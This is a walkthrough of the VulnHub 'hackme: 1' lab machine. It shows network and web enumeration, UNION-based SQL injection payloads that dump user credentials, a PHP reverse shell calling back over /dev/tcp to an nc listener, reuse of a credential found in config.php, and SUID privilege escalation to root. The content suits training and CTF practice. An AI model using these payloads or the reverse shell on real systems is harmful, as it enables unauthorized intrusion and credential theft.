VulnHub: hackme: 1

Initial Foothold

  1. Network discovery
nmap -sn 192.168.60.128/24

My target is 192.168.60.129.

2. TCP Portscan

nmap -Pn 192.168.60.129nmap -Pn -p1000- 192.168.60.129

There’re 2 services: ssh and http

3. UDP scan

nmap -sU -sV 192.168.60.129

4. OS and service scan

nmap -A -p22,80 192.168.60.129

5. Vuln scan

nmap --script vuln -p22,80 192.168.60.129

There’re HTTP pages the I can access.

Service Enumeration

  • SSH

Connect

ssh 192.168.60.129
  • HTTP
  1. nikto scan
nikto -h http://192.168.60.129

2. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.60.129/ -x php,txt,html,sh,cgi -q

3. Access site

There’s a username and password requirement and I also can sign up.

View page source

Access /uploads/

c

Register new user

Log in

There’s a search function and 3 columns. My guess is search function calls SQL query.

Exploitation

  1. Test for SQL injection
1' or 1=1--

No data

Try another test query

1' or 1=1-- - 

Succeeded. Next to continue to inject query to retrieve some data.

There’re 3 columns, my guess is I’ll union w/ 1,2,3. No need to test for column numbers like this:

1' union select 1-- -1' union select 1,2-- -

So my query is:

1' union select 1,2,3-- -

As predicted, there’re 3 columns needed for this query.

Retrieve trivial data

1' union select @@version,@@hostname,database()-- -

The host version is 5.7.25–0ubuntu0.18.10.2.

The hostname is hackme.

Database is webapphacking.

Get table name

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -

I have 2 tables: books and users.

Table: users is interesting. I will find its columns.

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()-- -

I have 5 columns: id, user, password, name, and address.

I need 3 columns: id, user, and password.

1' union select 1,group_concat(id,':',user,':',pasword),3 from users-- -

Copy it and organize w/ editor for easier viewing.

My intersintes is ‘superadmin’

Copy the hash and crack w/ crackstation. Now I have the password.

Login as superadmin.

I can upload files. I’ll try to upload reverse shell.

Prepare a reverse shell PHP script.

<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.60.128/443 0>&1'");

Prepare listener

rlwrap nc -lvp 443

Upload the file

Access it via /uploads/, click the file.

Back to the listener, now I got the connection.

Test it

id

Import TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

Privilege Escalation

  1. Explore directory
cd /var/www/htmlcat config.php

I got MySQL root’s credential.

Try to re-use it via SSH service.

ssh 192.168.60.129password: hackme1qaz@WSX

Failed!!!

cd /home/legacyls -la

I found this ‘touchmenot’ file.

Let’s try to run it

./touchmenot

Now I’m root.

The reason behind running it and get root shell immediately is SUID. Normally, you have to verify for SUID w/ this command

find / -perm -u=s -type f 2>/dev/null

From the result, you can continue the escalation process. This time, I’m just lucky w/ directory enumeration process and save a lot of time finding it.